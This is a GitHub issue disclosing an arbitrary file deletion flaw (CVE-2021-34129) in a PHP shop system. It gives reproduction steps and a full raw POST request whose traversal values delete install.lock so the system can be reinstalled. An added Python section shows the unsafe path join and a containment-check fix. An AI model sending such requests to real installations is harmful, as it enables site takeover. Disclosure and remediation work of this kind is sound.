Arbitrary file deletion leads to system reinstallation vulnerabilities #9

Open
sviivyao opened this issue Jun 1, 2021 · 1 comment

sviivyao commented Jun 1, 2021

When the system is successfully installed, it generates the install.lock file in the /data/ directory. When the user wants to reinstall, it first checks whether the install.lock file exists. If it exists, the installation cannot be repeated, but if we can find an arbitrary file deletion and use it to delete the install.lock file, we can directly reinstall the system.
The parameters $uploadImg, $oldpic, and $imgurl are all controllable:
[screenshot]
Vulnerability reproduction: first log in to the backend and access the link http://your domain /open/app/LKT//index.php?module=Article, and then publish an article.
[screenshot]
Then modify the article:
[screenshot]
Before proceeding with any file deletion, visit the install directory:
[screenshot]
Replace the parameters and delete any file:
[screenshot]
[screenshot]
Visit the install directory again and find that arbitrary file deletion has been achieved, which leads to the reinstallation vulnerability.
[screenshot]

POST /open/app/LKT//index.php?module=Article&action=modify HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------344640124212804469902957501276
Content-Length: 1265
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT//index.php?module=Article&action=modify&id=2&uploadImg=../LKT/images/
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=79kjqjkl1ntgk4q7se7maqtdcl
Upgrade-Insecure-Requests: 1

-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="id"

2
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="editable"

true
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="uploadImg"

../../
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_title"

222
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Article_prompt"

111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="sort"

100
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="imgurl"

../../111
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="oldpic"

app/data/install.lock
-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="Submit"


-----------------------------344640124212804469902957501276
Content-Disposition: form-data; name="content"

<p>32333<br/></p>
-----------------------------344640124212804469902957501276--
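The root cause the report describes is a delete-on-modify step that builds the path of the previous image from caller-controlled parameters (uploadImg, oldpic) and hands it to unlink without checking where it points. The following is an added defender-side illustration, not code from the issue or from the project: `vulnerable_target()` assumes a naive join of web root, upload directory and old picture name to show how the traversal escapes the upload directory, and `safe_delete_upload()` shows the containment check a fixed handler needs. The function names, the `/var/www/open/app/LKT` web root and the temporary directory layout in `demo()` are assumptions for the example; Python is used for illustration even though the application itself is PHP.

```python
"""
Path containment for user-supplied "old image" paths.

Added example (not the project's code). The web root, directory layout and
function names below are assumptions used only to illustrate the check.
"""
import os
import tempfile
from pathlib import Path


def vulnerable_target(web_root: str, upload_img: str, oldpic: str) -> str:
    """Assumed shape of the unsafe construction: the path that reaches unlink()
    is a plain join of caller-controlled segments, so '..' in upload_img or
    oldpic walks out of the upload directory. Nothing is deleted here; the
    normalized path is returned so the escape can be inspected."""
    return os.path.normpath(os.path.join(web_root, upload_img, oldpic))


class UnsafePathError(ValueError):
    """Raised when a user-supplied path would leave the allowed directory."""


def resolve_within(base_dir: Path, user_path: str) -> Path:
    """Resolve user_path relative to base_dir and ensure the result stays
    inside base_dir. Absolute paths are rejected outright; '..' segments and
    symlink escapes are caught because both sides are fully resolved before
    the containment comparison."""
    base = base_dir.resolve()
    if os.path.isabs(user_path):
        raise UnsafePathError(f"absolute path rejected: {user_path!r}")
    candidate = (base / user_path).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafePathError(f"path escapes upload directory: {user_path!r}") from None
    return candidate


def safe_delete_upload(upload_dir: Path, oldpic: str) -> bool:
    """Delete a previously uploaded image only if it resolves inside
    upload_dir and is a regular file. Returns True when a file was removed,
    False when it did not exist; raises UnsafePathError on traversal."""
    target = resolve_within(upload_dir, oldpic)
    if not target.is_file():
        return False
    target.unlink()
    return True


def demo() -> dict:
    """Constructed scenario: a throwaway tree with an install.lock outside the
    upload directory and one legitimate image inside it. Shows the traversal
    value from the report being refused while a normal delete still works."""
    with tempfile.TemporaryDirectory() as root:
        root_path = Path(root)
        lock = root_path / "app" / "data" / "install.lock"
        lock.parent.mkdir(parents=True)
        lock.write_text("installed")
        upload_dir = root_path / "LKT" / "images"
        upload_dir.mkdir(parents=True)
        legit = upload_dir / "pic.jpg"
        legit.write_bytes(b"\xff\xd8\xff")  # constructed JPEG-like stub

        traversal_rejected = False
        try:
            safe_delete_upload(upload_dir, "../../app/data/install.lock")
        except UnsafePathError:
            traversal_rejected = True

        return {
            "traversal_rejected": traversal_rejected,
            "lock_survived": lock.exists(),
            "legit_deleted": safe_delete_upload(upload_dir, "pic.jpg"),
            "legit_gone": not legit.exists(),
        }


if __name__ == "__main__":
    print("unsafe join would delete:",
          vulnerable_target("/var/www/open/app/LKT", "../../", "app/data/install.lock"))
    print(demo())
```

The essential point is that the check compares fully resolved paths rather than searching the input for `..`: a denylist on the string misses encoded or platform-specific variants, while `resolve()` followed by `relative_to()` asks the only question that matters, namely whether the final target lives under the upload directory.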

OS-WS commented Jun 22, 2021

Hi @bettershop @sviivyao
This issue was assigned with CVE-2021-34129.
Was it fixed?

Thanks!
